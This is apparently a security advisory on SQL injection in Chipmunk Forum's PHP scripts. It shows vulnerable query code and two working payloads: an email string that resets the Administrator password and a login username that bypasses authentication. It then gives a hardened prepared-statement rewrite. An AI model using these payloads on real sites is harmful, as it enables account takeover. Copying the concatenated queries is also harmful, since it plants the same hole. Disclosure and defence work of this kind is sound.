Chipmunk Forum is "a small yet flexible and fully featured forum system".
Due to inadequate filtering in Chipmunk Forum's PHP scripts, a remote attacker can insert arbitrary SQL statements into the application's existing queries, allowing them to gain elevated privileges on the forum, change user information, obtain passwords, and more.
Credit:
The information has been provided by GHC vision.
Vulnerable script getpassword.php
Vulnerable code:
if(isset($_POST['submit']))
{
$email=$_POST['email'];
$getinfo="SELECT * from b_users where email='$email'";
...
mail("$email","Your Forum password","Your forum password has been set to $value");
Exploit:
Use the following as the email: ghc@ghc.ru' or username='Administrator (the "Administrator" must be a valid user name); this will change the password of the Administrator account.
Vulnerable script authenticate.php
Vulnerable code:
$username=$_POST['user'];
$password=$_POST['password'];
$password=md5($password);
$query = "select * from b_users where username='$username' and password='$password' and validated='1'";
Exploit:
At the login.php page, enter Administrator'/* as the username.
Vulnerable script edit.php
Vulnerable code:
if(isset($_POST['ID']))
{
$ID=$_POST['ID'];
}
else
{
$ID=$_GET['ID'];
}
$checking="SELECT * from b_posts,b_users where b_users.userID=b_posts.author and b_posts.ID='$ID'";
It is possible to inject SQL statements through the $ID variable.
Vulnerable script search.php
Vulnerable code:
$searchterm=$_POST['searchterm'];
$getthreads="SELECT * from b_posts where post like '%$searchterm%' and threadparent='0' order by telapsed DESC limit $start, 50";
It is possible to inject SQL statements through $searchterm parameter.
Vulnerable script newtopic.php
Vulnerable code:
$name=$_POST['name'];
$title=$_POST['title'];
$post=$_POST['post'];
$day=date("D M d, Y H:i:s");
$timegone=date("U") ;
if($_POST['nosmiley'])
...
$name=strip_tags($name);
$title=strip_tags($title);
$post=strip_tags($post);
$posting="INSERT INTO b_posts (author, title, post,timepost, telapsed, postforum,lastpost,nosmilies,ipaddress) values ('$name', '$title', '$post', '$day', '$timegone','$forumID','$user','$nosmiley','$s')";
mysql_query($posting) or die("could not post");
It is possible to inject SQL statements through $name, $title, and $post parameters.
Vulnerable script reguser.php
Vulnerable code:
$username=$_POST['username'];
$password=$_POST['password'];
$signature=$_POST['signature'];
$pass2=$_POST['pass2'];
$usercheck="SELECT*from b_users where username='$username' or email='$email'";
...
if ($password==$pass2 && $_POST['password'])
{
$password=md5($password);
$supervalue=$value;
$day=date("U"); // garbled in the original listing; reconstructed from the date("U") call used in newtopic.php
$email=$_POST['email'];
$location=$_POST['location'];
$aim=$_POST['aim'];
$showprofile=$_POST['showprofile'];
$icq=$_POST['icq'];
$seedval=$day#0000;
srand($seedval);
$key=RAND(1000000,2000000);
if($requirekey=="no"||$requirekey=="No") //if you do not require an activation key
{
$SQL ="INSERT into b_users (username, password, sig, email, location, AIM, ICQ, showprofile, validated) values ('$username', '$password', '$signature', '$email', '$location', '$aim', '$icq', '$showprofile', '1')";
mysql_query($SQL) or die(mysql_error());
}
else //you require an activation key
{
$SQL ="INSERT into b_users (username, password, sig, keynode, email, location, AIM, ICQ, showprofile) values ('$username', '$password', '$signature', '$key', '$email', '$location', '$aim', '$icq', '$showprofile')";
mysql_query($SQL) or die(mysql_error());
mail("$email","Your forum activation key","Paste the URL to activate your account.
$boardpath/activate.php?username=$username&password=$password&keynode=$key");
}
It is possible to inject SQL statements through the registration form's variables.
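The same defect runs through every script above: a raw $_POST value is concatenated into the SQL string. Below is a hardened rewrite of the getpassword.php and authenticate.php queries using PDO prepared statements, added here as an example and not Chipmunk Forum's own code; it assumes a PDO connection $db to the forum database and keeps the b_users table and column names shown above.

```php
<?php
// Added example, not Chipmunk Forum's code. Assumes $db is a PDO handle
// (e.g. new PDO('mysql:host=localhost;dbname=forum', $user, $pass)) with
// PDO::ATTR_ERRMODE set to PDO::ERRMODE_EXCEPTION.

// Hardened equivalent of the getpassword.php lookup.
function findUserByEmail(PDO $db, string $email): ?array
{
    // Reject anything that is not a syntactically valid address up front;
    // the advisory's "ghc@ghc.ru' or username='Administrator" fails here.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // The placeholder is bound as data, so a quote inside $email stays a
    // literal character and can never close the string in the query.
    $stmt = $db->prepare('SELECT * FROM b_users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened equivalent of the authenticate.php query. md5() is kept only
// so the example matches the hashes the forum already stores; a new
// deployment should use password_hash() / password_verify() instead.
function authenticate(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT * FROM b_users
          WHERE username = :username AND password = :password
            AND validated = :validated'
    );
    // With binding, a username of "Administrator'/*" is compared as that
    // exact string; it cannot comment out the password condition.
    $stmt->execute([
        ':username'  => $username,
        ':password'  => md5($password),
        ':validated' => '1',
    ]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Numeric parameters such as edit.php's $ID should additionally be cast,
// so the value reaching the query is an integer rather than free text.
function loadPost(PDO $db, $rawId): ?array
{
    $stmt = $db->prepare('SELECT * FROM b_posts, b_users
        WHERE b_users.userID = b_posts.author AND b_posts.ID = :id');
    $stmt->execute([':id' => (int) $rawId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

The search.php and newtopic.php queries are fixed the same way: bind $searchterm (wrapped as '%' . $searchterm . '%' before binding) and each INSERT value as a parameter; strip_tags() removes HTML but does nothing to protect the SQL.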